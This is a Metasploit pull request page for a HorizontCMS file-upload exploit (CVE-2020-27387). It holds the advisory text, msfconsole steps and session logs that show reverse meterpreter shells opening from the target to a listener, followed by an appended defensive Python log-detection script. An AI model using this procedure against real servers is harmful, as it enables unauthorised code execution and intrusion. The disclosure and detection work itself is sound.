CVE-2020-27387: Add HorizontCMS 1.0.0-beta exploit module and documentation by ErikWynter · Pull Request #14340 · rapid7/metasploit-framework

An unrestricted file upload issue in HorizontCMS through 1.0.0-beta allows an authenticated remote attacker (with access to the FileManager) to upload and execute arbitrary PHP code by uploading a PHP payload, and then using the FileManager’s rename function to provide the payload (which will receive a random name on the server) with the PHP extension, and finally executing the PHP file via an HTTP GET request to /storage/<php_file_name>. NOTE: the vendor has patched this while leaving the version number at 1.0.0-beta.

About

This change adds a new module to /modules/exploits/multi/http/ that exploits an arbitrary file upload vulnerability (CVE-2020-27387) in HorizontCMS 1.0.0-beta and prior in order to execute arbitrary commands. The change also adds documentation for this module. I discovered and disclosed the vulnerability, which has been fixed, but not in a specific version release.

Vulnerable system

HorizontCMS 1.0.0-beta and prior

Verification Steps

  1. Install the module as usual
  2. Start msfconsole
  3. Do: use exploit/multi/http/horizontcms_upload_exec
  4. Do: set RHOSTS [IP]
  5. Do: set USERNAME [username for the HorizontCMS account]
  6. Do: set PASSWORD [password for the HorizontCMS account]
  7. Do: set target [target]
  8. Do: set payload [payload]
  9. Do: set LHOST [IP]
  10. Do: exploit

Options

PASSWORD

The password for the HorizontCMS account to authenticate with.

TARGETURI

The base path to HorizontCMS. The default value is /.

USERNAME

The username for the HorizontCMS account to authenticate with.

Targets

Id  Name
--  ----
0   PHP
1   Linux
2   Windows

Scenarios

HorizontCMS 1.0.0-beta running on Ubuntu 18.04 - PHP target

msf6 exploit(multi/http/horizontcms_upload_exec) > show options 
Module options (exploit/multi/http/horizontcms_upload_exec):
   Name       Current Setting   Required  Description
   ----       ---------------   --------  -----------
   PASSWORD   test              yes       Password to authenticate with
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.227     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80                yes       The target port (TCP)
   SSL        false             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                 yes       The base path to HorizontCMS
   URIPATH                      no        The URI to use for this exploit (default is random)
   USERNAME   test              yes       Username to authenticate with
   VHOST      testhorizont.com  no        HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.128    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   PHP
msf6 exploit(multi/http/horizontcms_upload_exec) > run
[*] Started reverse TCP handler on 192.168.1.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Target is HorizontCMS with version 1.0.0-beta
[+] Successfully authenticated to the HorizontCMS dashboard
[*] Uploading payload as EaCPK1HSbRru.php...
[+] Successfully uploaded EaCPK1HSbRru.php. The server renamed it to Mflikdb8nNKTivXU3HPZnpsCy3nOu34FH1IsWaxl
[+] Successfully renamed payload back to EaCPK1HSbRru.php
[*] Executing the payload...
[*] Sending stage (39264 bytes) to 192.168.1.227
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.227:49968) at 2020-10-31 15:52:57 -0400
[+] Successfully deleted EaCPK1HSbRru.php
meterpreter > getuid
Server username: www-data (33)
meterpreter >

HorizontCMS 1.0.0-beta running on Ubuntu 18.04 - Linux target

msf6 exploit(multi/http/horizontcms_upload_exec) > run
[*] Started reverse TCP handler on 192.168.1.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Target is HorizontCMS with version 1.0.0-beta
[+] Successfully authenticated to the HorizontCMS dashboard
[*] Uploading payload as W6nQKce4Uq.php...
[+] Successfully uploaded W6nQKce4Uq.php. The server renamed it to L6TL9BHTAckj6UrzfSyOBvAT3Bl2uFskRHrG3pXG
[+] Successfully renamed payload back to W6nQKce4Uq.php
[*] Executing the payload via a series of HTTP GET requests to `/storage/W6nQKce4Uq.php?qo1E=<command>`
[*] Sending stage (3008420 bytes) to 192.168.1.227
[*] Command Stager progress - 100.00% done (897/897 bytes)
[*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.227:49978) at 2020-10-31 15:56:58 -0400
[+] Successfully deleted W6nQKce4Uq.php
meterpreter > getuid
Server username: www-data @ ubuntu (uid=33, gid=33, euid=33, egid=33)
meterpreter >
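The description and the session output above give a defender a concrete detection pattern: a GET for a PHP-extension file under /storage/ (a directory that should only serve uploaded static content), often carrying a query string, shortly after POSTs from the same client to the CMS FileManager (login, upload, rename). The script below is an added example, not part of the advisory or of the Metasploit module, that applies that logic to Apache/nginx combined-format access logs. The log lines are constructed, and the /admin/filemanager/* paths are placeholders, since the advisory names the FileManager and its rename function but not their URLs; the extension list reflects a typical PHP handler configuration and is an assumption.

```python
import re
from datetime import datetime, timedelta
from typing import Dict, List, Optional

# Apache/nginx "combined" access log format (standard regex for that format).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Extensions a typical Apache/PHP setup hands to the interpreter. This list is an
# assumption about common server configuration, not something taken from the advisory.
EXECUTABLE_EXTS = (".php", ".php5", ".phtml", ".phar")

# Constructed sample traffic (not real logs). The /admin/filemanager/* paths are
# placeholders: the advisory names the FileManager and its rename function, not their URLs.
SAMPLE_LOG = """\
203.0.113.5 - - [31/Oct/2020:15:52:40 -0400] "POST /admin/login HTTP/1.1" 302 0
203.0.113.5 - - [31/Oct/2020:15:52:41 -0400] "POST /admin/filemanager/upload HTTP/1.1" 200 84
203.0.113.5 - - [31/Oct/2020:15:52:42 -0400] "POST /admin/filemanager/rename HTTP/1.1" 200 21
203.0.113.5 - - [31/Oct/2020:15:52:43 -0400] "GET /storage/EaCPK1HSbRru.php?qo1E=cmd HTTP/1.1" 200 55
198.51.100.9 - - [31/Oct/2020:15:53:10 -0400] "GET /storage/logo.png HTTP/1.1" 200 1480
198.51.100.9 - - [31/Oct/2020:15:53:11 -0400] "GET /storage/readme.PHP HTTP/1.1" 404 196
"""


def parse_line(line: str) -> Optional[Dict]:
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    path, _, query = rec["target"].partition("?")
    rec["path"], rec["query"] = path, query
    return rec


def is_executable_in_storage(path: str) -> bool:
    """True if the path points at a PHP-handled file under the CMS upload directory.
    Case-insensitive, because many handler configs also route 'x.PHP' to PHP."""
    p = path.lower()
    return p.startswith("/storage/") and p.endswith(EXECUTABLE_EXTS)


def detect(log_text: str, window: timedelta = timedelta(minutes=5)) -> List[Dict]:
    """Return one alert per GET of an executable file under /storage/, with the POSTs
    the same client sent within `window` before it as supporting context."""
    records = [r for r in (parse_line(l) for l in log_text.splitlines()) if r]
    alerts = []
    for i, rec in enumerate(records):
        if rec["method"] != "GET" or not is_executable_in_storage(rec["path"]):
            continue
        # Context: login, upload and rename all arrive as POSTs just before the GET.
        prior_posts = [
            r["path"] for r in records[:i]
            if r["ip"] == rec["ip"] and r["method"] == "POST"
            and rec["ts"] - r["ts"] <= window
        ]
        if rec["status"] == 200 and prior_posts:
            severity = "high"     # file executed and the upload/rename sequence preceded it
        elif rec["status"] == 200:
            severity = "medium"   # file executed; no preceding admin activity seen
        else:
            severity = "low"      # probe or leftover; the server did not serve it
        alerts.append({
            "ip": rec["ip"], "path": rec["path"], "status": rec["status"],
            "has_query": bool(rec["query"]), "prior_posts": prior_posts,
            "severity": severity,
        })
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(a["severity"].upper(), a["ip"], a["path"], a["status"], a["prior_posts"])
```

On the constructed sample this yields a high-severity alert for the 203.0.113.5 sequence (three POSTs followed by a served GET with a query string) and a low-severity one for the 404 probe. A simpler, complementary control is to have the web server refuse to execute anything under /storage/ at all (for example by not mapping PHP handlers for that directory), which turns the post-rename GET into a plain file download.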
